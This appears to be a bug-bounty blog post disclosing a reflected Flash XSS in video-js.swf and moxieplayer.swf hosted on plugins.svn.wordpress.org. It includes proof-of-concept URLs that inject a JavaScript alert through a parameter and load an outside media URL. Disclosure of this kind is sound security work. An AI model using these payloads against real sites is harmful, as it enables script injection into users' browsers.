Aug 28, 2018

Reflected Swf XSS at ( https://plugins.svn.wordpress.org )

Advertisement









Reflected Swf XSS at 
( https://plugins.svn.wordpress.org )

Program : Wordpress
Vulnerability    :   XSS
Bounty  : 350$ 

Affected files 
video-js.swf

moxieplayer.swf

Description 

https://plugins.svn.wordpress.org website is for downloading Plugins 
So all Swf files or PHP are not loaded on the websites
All files are Download not loaded
Except  
video-js.swf

moxieplayer.swf
Are loaded normal on the website !

Poc : 
https://plugins.svn.wordpress.org/1player/tags/1.3/players/video-js/video-js.swf?readyFunction=alert(%27Hello%27)
https://plugins.svn.wordpress.org/agile-video-player/trunk/js/plugins/media/moxieplayer.swf?url=hekimuso1973.xsl.pt/723.flv






Share This
Previous Post
Next Post

Security Researcher at Many Websites - Bug Hunter - Civil Engineer Student

0 comments: